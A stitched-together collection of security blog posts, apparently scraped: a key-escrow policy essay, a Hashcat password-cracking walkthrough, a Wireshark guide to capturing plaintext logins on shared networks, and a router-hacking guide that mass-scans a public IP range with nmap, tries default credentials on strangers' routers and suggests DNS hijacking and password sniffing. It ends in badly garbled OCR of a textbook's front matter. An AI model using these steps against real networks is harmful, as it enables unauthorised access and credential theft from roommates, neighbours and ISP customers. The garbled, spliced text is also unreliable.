encryptionIn this case, the only real alternative is to mandate some sort of key escrow. Abstractly, the purpose of an escrow system is to place decryption keys on file (‘escrow’ them) with some trusted authority, who can break them out when the need arises. In practice it’s usually a bit more complex. The first wrinkle is that modern encryption systems often feature many decryption keys, some of which can be derived on-the-fly while the system operates. (Systems such as TextSecure/WhatsApp actually derive new encryption keys for virtually every message you send.) Users with encrypted devices may change their password from time to time. To deal with this issue, a preferred approach is to wrap these session keys up (encrypt them) under some master public key generated by the escrow authority — and to store/send the resulting ciphertexts along with the rest of the encrypted data. In the 1990s Clipperspecification these ciphertexts were referred to as Law Enforcement Access Fields, or LEAFs.*** With added LEAFs in your protocol, wiretapping becomes relatively straightforward. Law enforcement simply intercepts the encrypted data — or obtains it from your confiscated device — extract the LEAFs, and request that the escrow authority decrypt them. You can find variants of this design dating back to the PGP era. In fact, the whole concept is deceptively simple — provided you don’t go farther than the whiteboard.  Conceptual view of some encrypted data (left) and a LEAF (right). It’s only when you get into the details of actually implementing key escrow that things get hairy. These schemes require you to alter every protocol in your encryption system, at a pretty fundamental level — in the process creating the mother of all security vulnerabilities — but, more significantly, they force you to think very seriously about who you trust to hold those escrow keys. Who does hold the keys? This is the million dollar question for any escrow platform. The Post story devotes much energy to exploring various proposals for doing this. Escrow key management is make-or-break, since the key server represents a universal vulnerability in any escrowed communication system. In the present debate there appear to be two solutions on the table. The first is to simply dump the problem onto individual providers, who will be responsible for managing their escrow keys — using whatever technological means they deem appropriate. A few companies may get this right. Unfortunately, most companies suck at cryptography, so it seems reasonable to believe that the resulting systems will be quite fragile. The second approach is for the government to hold the keys themselves. Since the escrow key is too valuable to entrust to one organization, one or more trustworthy U.S. departments would hold ‘shares‘ of the master key, and would cooperate to provide decryption on a case-by-case basis. This was, in fact, the approach proposed for the Clipper chip. The main problem with this proposal is that it’s non-trivial to implement. If you’re going to split keys across multiple agencies, you have to consider how you’re going to store those keys, and how you’re going to recover them when you need to access someone’s data. The obvious approach — bring the key shares back together at some centralized location — seems quite risky, since the combined master key would be vulnerable in that moment. A second approach is to use a threshold cryptosystem. Threshold crypto refers to a set of techniques for storing secret keys across multiple locations so that decryption can be done in place without recombining the key shares. This seems like an ideal solution, with only one problem: nobody has deployed threshold cryptosystems at this kind of scale before. In fact, many of the protocols we know of in this area have never even been implemented outside of the research literature. Moreover, it will require governments to precisely specify a set of protocols for tech companies to implement — this seems incompatible with the original goal of letting technologists design their own systems. Software implementations A final issue to keep in mind is the complexity of the software we’ll need to make all of this happen. Our encryption software is already so complex that it’s literally at the breaking point. (If you don’t believe me, take a look at OpenSSL’s security advisories for the last year) While adding escrow mechanisms seems relatively straightforward, it will actually require quite a bit of careful coding, something we’re just not good at. Even if we do go forward with this plan, there are many unanswered questions. How widely can these software implementations be deployed? Will every application maker be forced to use escrow? Will we be required to offer a new set of system APIs in iOS, Windows and Android that we can use to get this right? Answering each of these questions will result in dramatic changes throughout the OS software stack. I don’t envy the poor developers who will have to answer them. How do we force people to use key escrow? Leaving aside the technical questions, the real question is: how do you force anyone to do this stuff? Escrow requires breaking changes to most encryption protocols; it’s costly as hell; and it introduces many new security concerns. Moreover, laws outlawing end-to-end encryption software seem destined to run afoul of the First Amendment. I’m not a lawyer, so don’t take my speculation too seriously — but it seems intuitive to me that any potential legislation will be targeted at service providers, not software vendors or OSS developers. Thus the real leverage for mandating key escrow will apply to the Facebooks and Apples of the world. Your third-party PGP and OTR clients would be left alone, for the tiny percentage of the population who uses these tools. Unfortunately, even small app developers are increasingly running their own back-end servers these days (e.g., Whisper Systems and Silent Circle) so this is less reassuring than it sounds. Probably the big takeaway for encryption app developers is that it might be good to think about how you’ll function in a world where it’s no longer possible to run your own back-end data transport service — and where other commercial services may not be too friendly to moving your data for you. In conclusion If this post has been more questions than answers, that’s because there really are no answers right now. A serious debate is happening in an environment that’s almost devoid of technical input, at least from technical people who aren’t part of the intelligence establishment. And maybe that by itself is reason enough to be skeptical. Notes: • Not an endorsement. I have many thoughts on Telegram’s encryption protocols, but they’re beyond the scope of this post. ** Telegram is missing from this list because their protocol doesn’t handle long term keys at all. Every single connection must be validated in person using a graphical key fingerprint, which is, quite frankly, terrible. *** The Clipper chip used a symmetric encryption algorithm to encrypt the LEAF, which meant that the LEAF decryption key had to be present inside of every consumer device. This was completely nuts, and definitely a bullet dodged. It also meant that every single Clipper had to be implemented in hardware using tamper resistant chip manufacturing technology. It was a truly awful design. ## Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux Hashcat or cudaHashcat is the self-proclaimed world’s fastest CPU-based password recovery tool. Versions are available for Linux, OSX, and Windows and can come in CPU-based or GPU-based variants. Hashcat or cudaHashcat currently supports a large range of hashing algorithms, including: Microsoft LM Hashes, MD4, MD5, SHA-family, Unix Crypt formats, MySQL, Cisco PIX, and many others. Hashcat or cudaHashcat comes in two main variants: 1. Hashcat – A CPU-based password recovery tool 2. oclHashcat or cudaHashcat – A GPU-accelerated tool Many of the algorithms supported by Hashcat or cudaHashcat can be cracked in a shorter time by using the well-documented GPU-acceleration leveraged in oclHashcat or cudaHashcat (such as MD5, SHA1, and others). However, not all algorithms can be accelerated by leveraging GPUs. Hashcat or cudaHashcat is available for Linux, OSX and Windows. oclHashcat or cudaHashcat is only available for Linux and Windows due to improper implementations in OpenCL on OSX. ### My Setup My setup is simple. I have a NVIDIA GTX 210 Graphics card in my machine running Kali Linux 1.0.6 and will use rockyou dictionary for this whole exercise. In this post, I will show How to crack few of the most common hashes 1. MD5 2. MD5 – phpBB 3. MySQL and 4. SHA1 I will use 2 commands for every hash, hashcat and then cudahashcat. Because I am using a NVIDIA GPU, I get to use cudaHashcat. If you’re using AMD GPU, then I guess you’ll be using oclHashcat. Correct me if I am wrong here! AMD is currently much faster in terms of GPU cracking, but then again it really depends on your card. You can generate more hashes or collect them and attempt to crack them. Becuase I am using a dictionary, (it’s just 135MB), I am limited to selection number of passwords. The bigger your dictionary is, the more you’ll have success cracking an unknown hash. There are other ways to cracking them without using Dictionary (such as RainBow Tables etc.). I will try to cover and explain as much I can. Advanced users, I’m sure you already know these, so I would appreciate constructive comments. As always, read the manual and help file before you ask for help. Most of the things are covered in manuals and wiki available in www.hashcat.net. A big thanks goes to the Hashcat or cudaHashcat Dev team, they are the ones who created and maintained this so well. Cudos!. ### Getting hashes: First of all, we need to get our hashes. You can download hash generator applications, but there’s online sites that will allow you to create them. I will use InsidePro who kindly created a page that allows you create hashes on the fly and it’s publicly available. Visit them and feel free to browse their website to understand more about hashes. The password I am using is simple: abc123 All you need to do is enter this in password field of this page http://www.insidepro.com/hashes.php and click on generate. ### Cracking hashed MD5 passwords From the site, I copied the md5 hashed password and put it into a file. vi md5-1.txt cat md5-1.txt #### MD5 cracking using hashcat and cudahashcat Now it’s simple, I just typed in the following command and it took few seconds. hashcat -m 0 -a 0 /root/md5-1.txt /root/rockyou.txt Similarly, I can use cudahashcat. cudahashcat -m 0 -a 0 /root/md5-1.txt /root/rockyou.txt ### Cracking hashed MD5 – phpBB passwords From the site, copy the phpBB hashed password and put it into a file. vi md5phpbb-1.txt cat md5phpbb-1.txt What I didn’t explain in previous section, is that how do you know who mode to use or which attack code. You can type in hashcat --helpor cudahashcat --help and read through it. Because I will stick with attack mode 0 (Straight Attack Mode), I just need to adjust the value for -m where you specify which type of hash is that. hashcat --help | grep php So it’s 400 #### MD5 – phpBB cracking using hashcat and cudahashcat Let’s adjust our command and run it. hashcat -m 400 -a 0 /root/md5phpbb-1.txt /root/rockyou.txt and cudahashcat cudahashcat -m 400 -a 0 /root/md5phpbb-1.txt /root/rockyou.txt ### Cracking hashed MySQL passwords Similar step, we get the file from the website and stick that into a file. vi mysql-1.txt cat mysql-1.txt NOTE: *6691484EA6B50DDDE1926A220DA01FA9E575C18A <– this was the hash from the website, remove * from this one before you save this hash. First of all let’s find out the mode we need to use for MYSQL password hashes. hashcat --help | grep My Ah, I’m not sure which one to use here … #### MySQL hashed password cracking using hashcat and cudahashcat I’ll try 200 and see how that goes … hashcat -m 200 -a 0 /root/mysql-1.txt /root/rockyou.txt Nope not good, Let’s try 300 this time… hashcat -m 300 -a 0 /root/mysql-1.txt /root/rockyou.txt and cudahashcat cudahashcat -m 300 -a 0 /root/mysql-1.txt /root/rockyou.txt ### Cracking hashed SHA1 passwords Similar step, we get the file from the website and stick that into a file. vi sha1-1.txt cat sha1-1.txt Let’s find out the mode we need to use for SHA1 password hashes. hashcat --help | grep SHA1 #### SHA1 password cracking using hashcat and cudahashcat We already know what to do next… hashcat -m 100 -a 0 /root/sha1-1.txt /root/rockyou.txt and cudahashcat cudahashcat -m 100 -a 0 /root/sha1-1.txt /root/rockyou.txt ### Location of Cracked passwords Hashcat or cudaHashcat saves all recovered passwords in a file. It will be in the same directory you’ve ran Hashcat or cudaHashcat or oclHashcat. In my case, I’ve ran all command from my home directory which is /root directory. cat hashcat.pot ### Creating HASH’es using Kali As always, great feedback from zimmaro, Thanks. See his comment below: (I’ve removed IP and email details for obvious reasons). dude got some massive screen!!! 1920×1080 16:9 HD 1080p!!!  zimmaro_the_g0at Submitted on 2014/03/30 at 2:43 am all always(our-friend): excellent explanation and thank you for sharing your knowledge / experiences PS:if I may some “” basic-hash “” can be generated directly with our KALI http://www.imagestime.com/show.php/936022_hash.PNG.html ### Conclusion This guide is here to show you how you can crack passwords using simple attack mode.You might ask why I showed the same command over and over again! Well, by the end of this guide, you will never forget the basics. There’s of course advanced usage, but you need to have a strong basics. I would suggest to read Wiki and Manuals from www.hashcat.net to get a better understanding of rule based attacks because that’s the biggest strength of Hashcat. The guys in Hashcat forums are very knowledgeable and know what they are doing. If you need to know anything, you MUST read manuals before you go and ask something. Usually RTFM is the first response … so yeah, tread lightly. Thanks for reading. Feel free to share this article. ## Website Password & User Credentials Sniffing/Hacking Using WireShark Did you knew every time you fill in your username and password on a website and press ENTER, you are sending your password. Well, of course you know that. How else you’re going to authenticate yourself to the website?? But, (yes, there’s a small BUT here).. when a website allows you to authenticate using HTTP (PlainText), it is very simple to capture that traffic and later analyze that from any machine over LAN (and even Internet). That bring us to this website password hacking guide that works on any site that is using HTTP protocol for authentication. Well, to do it over Internet, you need to be able to sit on a Gateway or central HUB (BGP routers would do – if you go access and the traffic is routed via that). But to do it from a LAN is easy and at the same time makes you wonder, how insecure HTTP really is. You could be doing to to your roommate, Work Network or even School, College, University network assuming the network allows broadcast traffic and your LAN card can be set to promiscuous mode. So lets try this on a simple website. I will hide part of the website name (just for the fact that they are nice people and I respect their privacy.). For the sake of this guide, I will just show everything done on a single machine. As for you, try it between two VirtualBox/VMWare/Physical machines. p.s. Note that some routers doesn’t broadcast traffic, so it might fail for those particular ones. ## Step 1: Start Wireshark and capture traffic In Kali Linux you can start Wireshark by going to Application > Kali Linux > Top 10 Security Tools > Wireshark In Wireshark go to Capture > Interface and tick the interface that applies to you. In my case, I am using a Wireless USB card, so I’ve selected wlan0. Ideally you could just press Start button here and Wireshark will start capturing traffic. In case you missed this, you can always capture traffic by going back to Capture > Interface > Start ## Step 2: Filter captured traffic for POST data At this point Wireshark is listening to all network traffic and capturing them. I opened a browser and signed in a website using my username and password. When the authentication process was complete and I was logged in, I went back and stopped the capture in Wireshark. Usually you see a lot of data in Wireshark. However are are only interested on POST data. ### Why POST only? Because when you type in your username, password and press the Login button, it generates a a POSTmethod (in short – you’re sending data to the remote server). To filter all traffic and locate POST data, type in the following in the filter section http.request.method == “POST” See screenshot below. It is showing 1 POST event. ## Step 3: Analyze POST data for username and password Now right click on that line and select Follow TCP Steam This will open a new Window that contains something like this: HTTP/1.1 302 Found Date: Mon, 10 Nov 2014 23:52:21 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: non=non; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/ Set-Cookie: password=e4b7c855be6e3d4307b8d6ba4cd4ab91; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/ Set-Cookie: scifuser=sampleuser; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/ Location: loggedin.php Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 I’ve highlighted the user name and password field. So in this case, 1. username: sampleuser 2. password: e4b7c855be6e3d4307b8d6ba4cd4ab91 But hang on, e4b7c855be6e3d4307b8d6ba4cd4ab91 can’t be a real password. It must be a hash value. Note that some website’s doesn’t hash password’s at all even during sign on. For those, you’ve already got the username and password. In this case, let’s go bit far and identify this hash value ## Step 4: Identify hash type I will use hash-identifier to find out which type of hash is that. Open terminal and type in hash-identifier and paste the hash value. hash-identifier will give you possible matches. See screenshot below: Now one thing for sure, we know it’s not a Domain Cached Credential. So it must be a MD5 hash value. I can crack that using hashcat or cudahashcat. ## Step 5: Cracking MD5 hashed password I can easily crack this simple password using hashcat or similar softwares. root@kali:~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt (or) root@kali:~# cudahashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt (or) root@kali:~# cudahashcat32 -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt (or) root@kali:~# cudahashcat64 -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt Because this was a simple password that existed in my password list, hashcat cracked it very easily. #### Cracking password hashes Out final outcome looks like this: 1. username: sampleuser 2. password: e4b7c855be6e3d4307b8d6ba4cd4ab91:simplepassword ## Conclusion Well, to be honest it’s not possible for every website owner to implement SSL to secure password, some SSL’s cost you upto 1500$ per URL (well, you can get 10$ones too but I personally never used those so I can’t really comment). But the least website owners (public ones where anyone can register) should do is to implement hashing during login-procedures. In that way, at least the password is hashed and that adds one more hurdle for someone from hacking website password easily. Actually it’s a big one as SSL encryption (theoretically) can take 100+years even with the best SuperComputer of today. Enjoy and use this guide responsibly. Please Share and RT. Thanks. ## Router Hack – How to hack ADSL router using NMAP Asynchronous digital subscriber line (DSL or ADSL) modem is a device used to connect a computer or router to a telephone line which provides the digital subscriber line service for connectivity to the Internet, which is often called DSL or ADSL broadband. In this guide I will show you show you how to scan IP range for connected ADSL or DSL modem routers and find DSL ADSL router hack remotely. This guide applies to Windows, Linux or Mac, so it doesn’t matter what’s your Operating system is, you can try the same steps from all these operating systems. The term DSL or ADSL modem is technically used to describe a modem which connects to a single computer, through a USB port or is installed in a computer PCI slot. The more common DSL or ADSL router which combines the function of a DSL or ADSL modem and a home router, is a standalone device which can be connected to multiple computers through multiple Ethernet ports or an integral wireless access point. Also called a residential gateway, a DSL or ADSL router usually manages the connection and sharing of the DSL or ADSL service in a home or small office network. Put this together with Wireshark hacking for http websites, you got a nightmare for the user behind that router as all their passwords and details can be tracked very easily. ## What’s in a DSL ADSL Router? A DSL or ADSL router consists of a box which has an RJ11 jack to connect to a standard subscriber telephone line. It has several RJ45 jacks for Ethernet cables to connect it to computers or printers, creating a local network. It usually also has a USB jack which can be used to connect to computers via a USB cable, to allow connection to computers without an Ethernet port. A wireless DSL or ADSL router also has antennas to allow it to act as a wireless access point, so computers can connect to it forming a wireless network. Power is usually supplied by a cord from a wall wart transformer. It usually has a series of LED status lights which show the status of parts of the DSL or ADSL communications link: 1. Power light – indicates that the modem is turned on and has power. 2. Ethernet lights – There is usually a light over each Ethernet jack. A steady (or sometimes flashing) light indicates that the Ethernet link to that computer or device is functioning 3. DSL or ADSL light – a steady light indicates that the modem has established contact with the equipment in the local telephone exchange (DSL or ADSLAM) so the DSL or ADSL link over the telephone line is functioning 4. Internet light – a steady light indicates that the IP address and DHCP protocol are initialized and working, so the system is connected to the Internet 5. Wireless light – only in wireless DSL or ADSL modems, this indicates that the wireless network is initialized and working Almost every ADSL DSL modem router provides a management web-page available via Internal network (LAN or Local area network) for device management, configuration and status reporting. You are supposed to login to the management web-page, configure a username password combination provided by your ISP (Internet service provider) which then allows you to connect to internet. The network is divided into two parts: #### External Network External network indicates the part where ADSL DSL modem routers connects to upstream provider for internet connectivity. Once connected to the ISP via a Phone line (ADSL DSL Modem routers can use conventional Copper Phone lines to connect to ISP at a much higher speed), the router gets an IP address. This is usually a Publicly routable IP address which is open to the whole world. #### Internal Network Internal network indicates the part where devices in Local Area Network connects to the ADSL DSL modem router via either Wireless or Ethernet cable. Most modem DSL ADSL Modem routers runs a DHCP server internally which assigns an Internall IP address to the connected device. When I say device, this can be anything from a conventional computer, a laptop, a phone (Android, Apple, Nokia or Blackberry etc.), A smart TV, A Car, NAS, SAN, An orange, A banana, A cow, A dragon, Harry Potter … I mean anything that’s able to connect to internet! So you get the idea. Each device get’s it’s own IP address, a Gateway IP and DNS entries. Depending on different DSL ADSL Modem router, this can be slightly different, but the idea remains the same, the DSL ADSL Router allows users to share internet connectivity. These DSL ADSL Modem Routers are like miniature Gateway devices that can have many services running on them. Usually they all use BusyBox or similar proprietary Linux applications on them. You want to know what a DSL ADSL Router can do? Here’s a list of common services that can run on a DSL ADSL Modem Router: 1. ADSL2 and/or ADSL2+ support 2. Antenna/ae (wireless) 3. Bridge/Half-bridge mode 4. Cookie blocking 5. DHCP server 6. DDNS support 7. DoS protection 8. Switching 9. Intrusion detection 10. LAN port rate limiting 11. Inbuilt firewall 12. Inbuilt or Free micro-filter 13. Java/ActiveX applet blocking 14. Javascript blocking 15. MAC address filtering 16. Multiple public IP address binding 17. NAT 18. Packet filter 19. Port forwarding/port range forwarding 20. POP mail checking 21. QoS (especially useful for VoIP applications) 22. RIP-1/RIP-2 23. SNTP facility 24. SPI firewall 25. Static routing 26. So-called “DMZ” facility 27. RFC1483 (bridged/routed) 28. IPoA 29. PPPoE 30. PPPoA 31. Embedded PPPoX login clients 32. Parental controls 33. Print server inbuilt 34. Scheduling by time/day of week 35. USB print server 36. URL blocking facility 37. UPnP facility 38. VPN pass-through 39. Embedded VPN servers 40. WEP 64/128/256 bit (wireless security) 41. WPA (wireless security) 42. WPA-PSK (wireless security) That’s a lot of services running on a small device that are configured by nanny, granny, uncle, aunt and the next door neighbour, in short many non technical people around the world. How many of those configured badly? Left ports open left right and center? Didn’t change default admin passwords? Many! I mean MANY! In this guide we will use namp to scan a range of IP addresses, from output we will determine which are DSL ADSL Routers and have left their Management ports open to External Network. (again read top section to know which one is a external network). A typical ADSL Router’s Management interface is available via following URL: http://10.0.0.1/ http://192.168.0.1/ http://192.168.1.1/ http://192.168.1.254/ etc. This is the Management page for DSL ADSL modem router and it’s always protected by a password. By default, this password is written below a DSL ADSL modem router in a sticker and they are one of these combinations: Username/Password admin/admin admin/password admin/pass admin/secret etc. A lot of the home users doesn’t change this password. Well, that’s ok. It doesn’t hurt much cause this is only available via a connected device. But what’s not OKAY is when users open up their management to the external network. All you need to know what’s the Public IP address for your target and just try to access this management page externally. ## Installing NMAP I use Kali Linux which comes with NMAP Preinstalled. If you are using Windows or Mac (or any other flavour of Linux) go to the following website to download and install NMAP. #### Linux Installation: For Ubuntu, Debian or aptitude based system NMAP is usually made available via default repository. Install NMAP using the following command: sudo apt-get install nmap For YUM Based systems such as Redhat, CentOS, install via sudo yum install nmap For PACMAN based systems such as Arch Linux, install via sudo pacman -S nmap #### Windows Installation: For Windows Computers, download installer and run the executable. Link: http://nmap.org/dist/nmap-6.46-setup.exe #### Mac Installation: For Mac users, download installer and install Link: http://nmap.org/dist/nmap-6.46.dmg #### Official NMAP site You can read more about NMAP here:http://nmap.org/ ## Search for Vulnerable Routers Now that we have NMAP sorted, we are going to run the following command to scan for ADSL Modem Routers based on their Banner on Port 80 to start our ADSL router hack. All you need is to pick an IP range. I’ve used an example below using 101.53.64.1/24 range. ### Search from Linux using command Line In Linux run the following command: nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped' In Windows or Mac open NMAP and copy paste this line: nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG - Once it finds the results, search for the word ‘open’ to narrow down results. A typical Linux NMAP command would return outputs line below: (and of course I’ve changed the IP details) Host: 101.53.64.3 () Ports: 80/open/tcp//tcpwrapped/// Host: 101.53.64.4 () Ports: 80/open/tcp//http//micro_httpd/ Host: 101.53.64.9 () Ports: 80/open/tcp//tcpwrapped/// Host: 101.53.64.19 () Ports: 80/open/tcp//tcpwrapped/// Host: 101.53.64.20 () Ports: 80/open/tcp//http//Fortinet VPN|firewall http config/ Host: 101.53.64.23 () Ports: 80/open/tcp//tcpwrapped/// Host: 101.53.64.31 () Ports: 80/open/tcp//http?/// Host: 101.53.64.33 () Ports: 80/open/tcp//tcpwrapped/// Host: 101.53.64.35 () Ports: 80/open/tcp//http?/// Host: 101.53.64.37 () Ports: 80/open/tcp//http?/// Host: 101.53.64.49 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/ Host: 101.53.64.52 () Ports: 80/open/tcp//http?/// Host: 101.53.64.53 () Ports: 80/open/tcp//ssl|http//thttpd/ Host: 101.53.64.58 () Ports: 80/open/tcp//http?/// Host: 101.53.64.63 () Ports: 80/open/tcp//tcpwrapped/// Host: 101.53.64.69 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/ Host: 101.53.64.73 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/ Host: 101.53.64.79 () Ports: 80/open/tcp//http//Apache httpd/ Host: 101.53.64.85 () Ports: 80/open/tcp//http//micro_httpd/ Host: 101.53.64.107 () Ports: 80/open/tcp//http?/// Host: 101.53.64.112 () Ports: 80/open/tcp//http?/// Host: 101.53.64.115 () Ports: 80/open/tcp//tcpwrapped/// Host: 101.53.64.123 () Ports: 80/open/tcp//tcpwrapped/// Host: 101.53.64.129 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/ Host: 101.53.64.135 () Ports: 80/open/tcp//tcpwrapped/// Host: 101.53.64.145 () Ports: 80/open/tcp//http//micro_httpd/ Host: 101.53.64.149 () Ports: 80/open/tcp//http//Microsoft IIS httpd 6.0/ Host: 101.53.64.167 () Ports: 80/open/tcp//tcpwrapped/// Host: 101.53.64.170 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/ Host: 101.53.64.186 () Ports: 80/open/tcp//http?/// Host: 101.53.64.188 () Ports: 80/open/tcp//tcpwrapped/// Host: 101.53.64.193 () Ports: 80/open/tcp//tcpwrapped/// Host: 101.53.64.202 () Ports: 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/ Host: 101.53.64.214 () Ports: 80/open/tcp//tcpwrapped/// Host: 101.53.64.224 () Ports: 80/open/tcp//http//Allegro RomPager 4.51 UPnP|1.0 (ZyXEL ZyWALL 2)/ This was taking a long time (we are after all try to scan 256 hosts using the command above). Me being just impatient, I wanted to check if my Kali Linux was actually doing anything to ADSL router hack. I used the following command in a separate Terminal to monitor what my PC was doing… it was doing a lot … tcpdump -ni eth0 That’s a lot of connected hosts with TCP Port 80 open. Some got ‘tcpwrapped’ marked on them. It means they are possibly not accessible. ### Search from Windows, Mac or Linux using GUI – NMAP or Zenmap Assuming you got NMAP installation sorted, you can now open NMAP (In Kali Linux or similar Linux distro, you can use Zenmap which is GUI version of NAMP cross platform). Copy paste the following line in Command field nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/26 -p80 -oG - another version of this command is using different representation of Subnet MASK. nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG - Press SCAN Button and wait few minutes till the scan is over. Once you have some results, then you need to find the open devices with open ports. In search Result page: 1. Click on Services Button 2. Click on http Service 3. Click on Ports/Hosts TAB (Twice to sort them by status) As you can see, I’ve found a few devices with open http port 80. It is quite amazing how many devices got ports open facing outer DMZ. ## Access Management Webpage Pick one at a time. For example try this: http://101.53.64.3 http://101.53.64.4 http://101.53.64.129  You get the idea. If it opens a webpage asking for username and password, try one of the following combinations: admin/admin admin/password admin/pass admin/secret If you can find the Router’s model number and make, you can find exact username and password from this webpage: http://portforward.com/default_username_password/ Before we finish up, I am sure you were already impatient like me as a lot of the routers had ‘tcpwrapped’ on them which was actually stopping us from accessing the web management interface to ADSL router hack. Following command will exclude those devices from our search. I’ve also expanded my search to a broader range using a slightly different Subnet MASK. nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/22 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped' In this command I am using /22 Subnet Mask with 2 specific outputs: I am looking for the work ‘open’ and excluding ‘tcpwrapped’ on my output. As you can see, I still get a lot of outputs. ## Conclusion You’ll be surprised how many have default username and passwords enabled. Once you get your access to the router, you can do a lot more, like DNS hijacking, steal username and passwords (for example: Social Media username passwords (FaceBook, Twitter, WebMail etc.)) using tcpdump/snoop on router’s interface and many more using ADSL router hack … There’s many things you can do after you’ve got access to a router. You can change DNS settings, setup a tcpdump and later snoop all plaintext passwords using wireshark etc. If you know a friends, family. colleague or neighbor who didn’t change their routers default password, let them know of the risks. But I am not here to judge whether it should be done or not, but this is definitely a way to gain access to a router. So hacking is not always bad, it sometime is required when you loose access or a system just wouldn’t respond. As a pentester, you should raise awareness. Share this guide as anyone who uses a Linux, Windows, Mac can use this guide to test their own network and fix ADSL router hack issue. ## Hacker Techniques, Tools And Incident Handling – Jones And Bartlett Learning Full text can be downloaded in pdf format (eBook): https://ia802303.us.archive.org/13/items/HackerTechniquesAndTools/Hacker%20techniques%20and%20tools.pdf JONE-fi & BARTLETT LEARNING INFORMATION SYSTEMS SECURITY 3 ASSURANCE SERIES Hacker Techniques, Tools, and Incident/ Handling / StAN-PHILIPDRtYAMO AND MlCHAEt GREGG Janes & Bartlett Learning International Sarb House, Barb Mews London W6 7 PA United Kingdom World Headquarters Jones a Bartlett Learning Jones Si Bartlett Learning Canada 40 Ta It Pin e Drive 6339 Orm i nd a le Wa y S udbury, MA D1 776 Mississauga, Ontario LBV 1J2 978-443-5000 Canada info@jblearning.com www. ibis a rning.com Jones & Bartlett Learning books and products a re availa bEa through most bookstores and online booksellers. To contact Jones & Bartlett Learning directly, call 300′ 333 -003 4, fa* 973 443 3000, or visit our webs ita, http://www.jblearning.com. Substantial discounts on bulk quantities of Jones & Bartlett Learning publications are available to tofporar ens, professional associations, and other qualified! organizations. For details and specific discount information, contact the special sales department at Jones & Bartlett Learning via the above contact information or send an email to specialsales@jblearning.com. Copyright® 2D 11 by Jones & Barllc ll Learning, LLC All rights reserved. No part of the material protected by this copyright may be reproduced or utilized in any form, electronic or mechanical, including photocopying, recording, or by any information storage and retrieval system, without written permission from the copyright owner. This publication is designed to provide accurate and authoritative information in regard to the subject matter cohered. It is sold with the understanding that the publisher is not engaged in rendering legal, accounting, or other professional service. If legal advice or other expert assistance \s required, the service of a competent professional person should be sought Pro due lion Credits Chief Executive Officer: Ty Field President. James Homer 5 VP. Chief Operating Officer: Don Jones, Jr. SVP. Chief Technology Officer: Dean Fosse I la SVP. Chief Marketing Officer: Alison M. Pendergast SVP. Chief Financial Officer! Ruth Siporin SVP. Business Development. Christopher Will VP, Design and Production: Anne Spencer VP, Manufacturing, and Inventory Control. Therese Connell Editorial Management: High Stakes Writing. LLC, Ed to*’ and Publisher. Lawrence J. Goodrich Reprints and Special Projects Manager: Susan Schultz Associate Production Editor: Tina Chen Director of Marketing: Alisha Weisman Senior Marketing Manager: Andrea DeFronzo Cover Design: Anne Spencer Composition: Mia Saunders Design Cover Image: © Handy Widiyanto/ShutterStock, Inc. Chapter Opener Image:® Rodolfo Clix/Dra a mstime.com Printing and Binding: M alloy. Inc. Cover Printing: Ma Hoy, Inc. IS 9 N 9704-7637-9183-* 6048 Printed in the United States of America 14 1312 11 10 10947 6 5 4321 Contents Preface xifi Acknowledgments xv part one Hacker Techniques and Tools 1 Hacking: The Next Generation 2 Profiles of Hackers, Crackers, and Cybercrirninals 4 The Hacker Mindset 6 A Look Back at the History of Computer Hacking 9 Eth i cal H acki ng a nd Pe netrati o n Testi ng 1 2 The Role of Ethical Hacking 13 Common Hacking Methodologies 15 Performing a Penetration Test 1 7 The Role of the Law and Ethical Standards 1 9 CHAPTER SUMMARY 21 KEY CONCEPTS AND TERMS 21 CHAPTER 1 ASSESSMENT 22 TCP/IP Review 23 Exploring the OSl Reference Model 25 The Role of Protocols 25 Layer 1 ; Physical Layer 26 Layer 2: Data Link Layer 27 Layer 3: Network Layer 28 Layer 4; Transport Layer 28 Layer 5: Session Layer 29 Layer 6: Presentation layer 29 Layer 7 : Applies tion Layer 30 Mapping the OSl to Functions and Protocols 31 TCP/IP (A Layer-by-Layer Review) 32 Physi cal/Network Access Layer 3 3 Internetwork Layer 36 Host-to- Host Layer 42 Application Layer 44 Contents CHAPTER SUMMARY 48 KEY CONCEPTS AND TERMS 48 CHAPTER 2 ASSESSMENT 49 CHAPTER 3 Cry ptog ra ph i c Con cepts 50 Cryptographic Basics 52 Cryptographic History 55 Sy m metric E ncrypti on 58 Asymmetric Encryption 61 Digital Signatures 65 Purpose of Public Key Infrastructure 66 The Role of Certificate Authorities (CAs) PKI Attacks 71 Hashing 72 Common Cryptographic Systems 74 Cryptanalysis 75 CHAPTER SUMMARY 78 KEY CONCEPTS AND TERMS 79 CHAPTER 3 ASSESSMENT 79 69 CHAPTER 4 Physical Security 81 Basic Equipment Control 5 82 Hard Drive and Mobile Device Encryption Fax Machines and Public Branch Exchanges Voice over IP (VoIP) S6 Physical Area Controls 87 Fences 87 Gates 89 Bollards 90 Facility Controls 90 Doo rs, M an tra ps r and Turnstiles 91 Walls, Ceilings, and Floors 92 Windows 93 Guards and Dogs 93 Construction 94 Personal Safety Controls 94 Lighting 95 Alarms and Intrusion Detection 95 Closed-Circuit TV (CCW) 96 82 Contents v Physical Access Con trofs 97 